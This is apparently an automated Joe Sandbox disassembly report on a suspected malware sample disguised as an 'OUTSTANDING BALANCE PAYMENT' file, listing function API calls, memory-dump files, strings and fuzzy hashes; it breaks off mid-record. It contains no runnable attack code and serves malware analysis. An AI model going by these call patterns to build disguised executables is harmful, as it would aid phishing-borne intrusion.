                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00B9AFAE
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00B9AFB5
                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00B9AFC4
                                                          • CloseHandle.KERNEL32(00000004), ref: 00B9AFCF
                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B9AFFE
                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00B9B012
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                          • String ID:
                                                          • API String ID: 1413079979-0
                                                          • Opcode ID: c707903b4af00e10a975cac71a232c66e6d88926c56159adacb230d711b69fe2
                                                          • Instruction ID: d8e6851dd3b5ead1426e4ba24e2f770fb840d0858ec82b1955b0212e9681782e
                                                          • Opcode Fuzzy Hash: c707903b4af00e10a975cac71a232c66e6d88926c56159adacb230d711b69fe2
                                                          • Instruction Fuzzy Hash: 7A215E72100249AFDF128F94ED89FAE7BE9EF44304F144065FA01A6161C7B69D21EBA1
                                                          APIs
                                                            • Part of subcall function 00B7AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00B7AFE3
                                                            • Part of subcall function 00B7AF83: SelectObject.GDI32(?,00000000), ref: 00B7AFF2
                                                            • Part of subcall function 00B7AF83: BeginPath.GDI32(?), ref: 00B7B009
                                                            • Part of subcall function 00B7AF83: SelectObject.GDI32(?,00000000), ref: 00B7B033
                                                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00BCEC20
                                                          • LineTo.GDI32(00000000,00000003,?), ref: 00BCEC34
                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00BCEC42
                                                          • LineTo.GDI32(00000000,00000000,?), ref: 00BCEC52
                                                          • EndPath.GDI32(00000000), ref: 00BCEC62
                                                          • StrokePath.GDI32(00000000), ref: 00BCEC72
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                          • String ID:
                                                          • API String ID: 43455801-0
                                                          • Opcode ID: ac3d2492cf65be73c7ce8d5d01722da2d2725e45e41655482bbe9ade303d5d7b
                                                          • Instruction ID: 692a1aa0b4cfd4ace9f00943e39d49de6d4c58d58a0ca0e3e8dd5ff0039e067b
                                                          • Opcode Fuzzy Hash: ac3d2492cf65be73c7ce8d5d01722da2d2725e45e41655482bbe9ade303d5d7b
                                                          • Instruction Fuzzy Hash: 77110C72000149BFDF119F90DC88FDA7F6DEB08360F048156BE189A161D7719D55DBA0
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 00B9E1C0
                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B9E1D1
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B9E1D8
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00B9E1E0
                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00B9E1F7
                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 00B9E209
                                                            • Part of subcall function 00B99AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00B99A05,00000000,00000000,?,00B99DDB), ref: 00B9A53A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CapsDevice$ExceptionRaiseRelease
                                                          • String ID:
                                                          • API String ID: 603618608-0
                                                          • Opcode ID: 369525c4e19bfb91a4a6ab3d6b207e02f24c628882ef796df71a8ff57f018d41
                                                          • Instruction ID: 465b3a950918bdab93f65673512d0eca78275a5546dae73cf7c3ba71e375700a
                                                          • Opcode Fuzzy Hash: 369525c4e19bfb91a4a6ab3d6b207e02f24c628882ef796df71a8ff57f018d41
                                                          • Instruction Fuzzy Hash: 180184B5A00254BFEF109BA58C45B5EBFB9EF48751F044066EA04AB290DA719C00CB60
                                                          APIs
                                                          • __init_pointers.LIBCMT ref: 00B87B47
                                                            • Part of subcall function 00B8123A: __initp_misc_winsig.LIBCMT ref: 00B8125E
                                                            • Part of subcall function 00B8123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00B87F51
                                                            • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00B87F65
                                                            • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00B87F78
                                                            • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00B87F8B
                                                            • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00B87F9E
                                                            • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00B87FB1
                                                            • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00B87FC4
                                                            • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00B87FD7
                                                            • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00B87FEA
                                                            • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00B87FFD
                                                            • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00B88010
                                                            • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00B88023
                                                            • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00B88036
                                                            • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00B88049
                                                            • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00B8805C
                                                            • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00B8806F
                                                          • __mtinitlocks.LIBCMT ref: 00B87B4C
                                                            • Part of subcall function 00B87E23: InitializeCriticalSectionAndSpinCount.KERNEL32(00C1AC68,00000FA0,?,?,00B87B51,00B85E77,00C16C70,00000014), ref: 00B87E41
                                                          • __mtterm.LIBCMT ref: 00B87B55
                                                            • Part of subcall function 00B87BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00B87B5A,00B85E77,00C16C70,00000014), ref: 00B87D3F
                                                            • Part of subcall function 00B87BBD: _free.LIBCMT ref: 00B87D46
                                                            • Part of subcall function 00B87BBD: DeleteCriticalSection.KERNEL32(00C1AC68,?,?,00B87B5A,00B85E77,00C16C70,00000014), ref: 00B87D68
                                                          • __calloc_crt.LIBCMT ref: 00B87B7A
                                                          • GetCurrentThreadId.KERNEL32 ref: 00B87BA3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                          • String ID:
                                                          • API String ID: 2942034483-0
                                                          • Opcode ID: 92ae30d8221ed9205dc5d56e04da96330d38c499c4ac9bd64409275023fbc946
                                                          • Instruction ID: 4a43933cb6f16cbacf5cf2505e65e6984bd90daf046e0e36019173d6f99f5043
                                                          • Opcode Fuzzy Hash: 92ae30d8221ed9205dc5d56e04da96330d38c499c4ac9bd64409275023fbc946
                                                          • Instruction Fuzzy Hash: 55F06D3219D65219E628BA34BD16B4A26CA9B02739B3046E9F9A4D50F2EF20C842C361
                                                          APIs
                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B6281D
                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00B62825
                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B62830
                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B6283B
                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00B62843
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B6284B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Virtual
                                                          • String ID:
                                                          • API String ID: 4278518827-0
                                                          • Opcode ID: c7b622aa08772ac49e01a6d3db309df3ddafb382845240b81a9c33d461985f6d
                                                          • Instruction ID: 6432f6e2e608fc2ff7827f59a56589754ea2ec08ef0546a9faee8ed741f982fe
                                                          • Opcode Fuzzy Hash: c7b622aa08772ac49e01a6d3db309df3ddafb382845240b81a9c33d461985f6d
                                                          • Instruction Fuzzy Hash: E7016CB0901B597DE3008F6A8C85B52FFA8FF15354F00411B915C47941C7F5A864CBE5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                          • String ID:
                                                          • API String ID: 1423608774-0
                                                          • Opcode ID: 9e50ecbffef5ebd0b42ce2a80deb955424b92c3c09c4f74168996130027e4350
                                                          • Instruction ID: 8b0f140ae556233471b8019d6c70da4325d23ecd641486f6c4e0257837eeee32
                                                          • Opcode Fuzzy Hash: 9e50ecbffef5ebd0b42ce2a80deb955424b92c3c09c4f74168996130027e4350
                                                          • Instruction Fuzzy Hash: 2701A432206221ABDB151B58ECC8DEB77A9FF89701B04046AF603DB0A0DFB59C00EB51
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00BA7C07
                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00BA7C1D
                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00BA7C2C
                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BA7C3B
                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BA7C45
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BA7C4C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 839392675-0
                                                          • Opcode ID: 7c2f2ab89f73bec1c7c4a2d44d82c2cf41d0a89d41f5006d7d815a5cc4138b8c
                                                          • Instruction ID: 91d22fc258f6d0a8f55f483109b4395c8743eaa1f06d379b7ba0754204ef0088
                                                          • Opcode Fuzzy Hash: 7c2f2ab89f73bec1c7c4a2d44d82c2cf41d0a89d41f5006d7d815a5cc4138b8c
                                                          • Instruction Fuzzy Hash: 50F03A72241198BFE7215B529C4EEEF7BBCEFC6B11F000158FA01AA051EBE05A41C6B5
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,?), ref: 00BA9A33
                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,00BD5DEE,?,?,?,?,?,00B6ED63), ref: 00BA9A44
                                                          • TerminateThread.KERNEL32(?,000001F6,?,?,?,00BD5DEE,?,?,?,?,?,00B6ED63), ref: 00BA9A51
                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00BD5DEE,?,?,?,?,?,00B6ED63), ref: 00BA9A5E
                                                            • Part of subcall function 00BA93D1: CloseHandle.KERNEL32(?,?,00BA9A6B,?,?,?,00BD5DEE,?,?,?,?,?,00B6ED63), ref: 00BA93DB
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00BA9A71
                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,00BD5DEE,?,?,?,?,?,00B6ED63), ref: 00BA9A78
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                          • String ID:
                                                          • API String ID: 3495660284-0
                                                          • Opcode ID: f4dbe6b938103a31d41a0df968d4cf3c3ecc96d40c83910441fd390ad6c55fa4
                                                          • Instruction ID: faaa89866f0d9ab7685d56f2bcd8660d6345df3595377920af20052f34860160
                                                          • Opcode Fuzzy Hash: f4dbe6b938103a31d41a0df968d4cf3c3ecc96d40c83910441fd390ad6c55fa4
                                                          • Instruction Fuzzy Hash: 5DF05E32145251ABD7111BA4ECC9DAA7779FF85701B140466F6039A0A0DFB59801EB51
                                                          APIs
                                                            • Part of subcall function 00B7F4EA: std::exception::exception.LIBCMT ref: 00B7F51E
                                                            • Part of subcall function 00B7F4EA: __CxxThrowException@8.LIBCMT ref: 00B7F533
                                                          • __swprintf.LIBCMT ref: 00B61EA6
                                                          Strings
                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00B61D49
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                          • API String ID: 2125237772-557222456
                                                          • Opcode ID: 65aa60e3eb212a21ffe0fc3f82df7bdcad82de407560367726154debe5cbb600
                                                          • Instruction ID: a1544626073b79d863028c252d13787974336e91a2121b1e71664f60b59d6cae
                                                          • Opcode Fuzzy Hash: 65aa60e3eb212a21ffe0fc3f82df7bdcad82de407560367726154debe5cbb600
                                                          • Instruction Fuzzy Hash: 1D917D715042029FDB14EF28C896C6ABBF4EF95700F0449AEF895972A1EB75ED04CB92
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 00BBB006
                                                          • CharUpperBuffW.USER32(?,?), ref: 00BBB115
                                                          • VariantClear.OLEAUT32(?), ref: 00BBB298
                                                            • Part of subcall function 00BA9DC5: VariantInit.OLEAUT32(00000000), ref: 00BA9E05
                                                            • Part of subcall function 00BA9DC5: VariantCopy.OLEAUT32(?,?), ref: 00BA9E0E
                                                            • Part of subcall function 00BA9DC5: VariantClear.OLEAUT32(?), ref: 00BA9E1A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                          • API String ID: 4237274167-1221869570
                                                          • Opcode ID: 8f8df675a51032aa62236c1aabc0aae29eb1038a82efb3c629d24ae717aa68d3
                                                          • Instruction ID: 224a7373748b010327b9fe0e440de3cd071e534e521fb34891b301298a67828d
                                                          • Opcode Fuzzy Hash: 8f8df675a51032aa62236c1aabc0aae29eb1038a82efb3c629d24ae717aa68d3
                                                          • Instruction Fuzzy Hash: B7915C706083059FCB10DF28C495DAABBF4EF89704F1448ADF89A9B361DBB1E945CB52
                                                          APIs
                                                            • Part of subcall function 00B7C6F4: _wcscpy.LIBCMT ref: 00B7C717
                                                          • _memset.LIBCMT ref: 00BA5438
                                                          • GetMenuItemInfoW.USER32(?), ref: 00BA5467
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00BA5513
                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00BA553D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                          • String ID: 0
                                                          • API String ID: 4152858687-4108050209
                                                          • Opcode ID: 9a7545cfba887e1475ac4d02fa47c5a413da9c76afdacf487b32379239f658f3
                                                          • Instruction ID: b7e17f2f8f79e931d9b212e44d38047068b39abcf53b1f49e94b9aa4894757fe
                                                          • Opcode Fuzzy Hash: 9a7545cfba887e1475ac4d02fa47c5a413da9c76afdacf487b32379239f658f3
                                                          • Instruction Fuzzy Hash: 6751037150C7019BD7249B28C8817BFB7E9EFA6750F0406A9F896D3291DBA0CE44CB52
                                                          APIs
                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00BA027B
                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00BA02B1
                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00BA02C2
                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00BA0344
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                          • String ID: DllGetClassObject
                                                          • API String ID: 753597075-1075368562
                                                          • Opcode ID: 2a1cddf12568eabc044c1237b05e246ee81c72791fc1c409d9fc40ed01d0f53e
                                                          • Instruction ID: 0ffd398393b021754daef6f770b0743d3e403448c9155f882251bdf3921f5b63
                                                          • Opcode Fuzzy Hash: 2a1cddf12568eabc044c1237b05e246ee81c72791fc1c409d9fc40ed01d0f53e
                                                          • Instruction Fuzzy Hash: 04415BB1618204EFDF05EF54C8C5B9A7BF9EF4A311F1480E9A9099F206D7B1D944CBA4
                                                          APIs
                                                          • _memset.LIBCMT ref: 00BA5075
                                                          • GetMenuItemInfoW.USER32 ref: 00BA5091
                                                          • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00BA50D7
                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00C21708,00000000), ref: 00BA5120
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Menu$Delete$InfoItem_memset
                                                          • String ID: 0
                                                          • API String ID: 1173514356-4108050209
                                                          • Opcode ID: 9575ff8d177b29444c72776eea8416713347d9a3e0a0d207bee069a15bb1efb4
                                                          • Instruction ID: c4d6a304a4db12d333be1e3150108996d7c964cfbea52c2fdc050fc1e27d6d32
                                                          • Opcode Fuzzy Hash: 9575ff8d177b29444c72776eea8416713347d9a3e0a0d207bee069a15bb1efb4
                                                          • Instruction Fuzzy Hash: 5741C371208741AFD730DF24D885F6ABBE4EF86324F14469EF855A7291D770EA00CB62
                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?,?,?), ref: 00BC0587
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
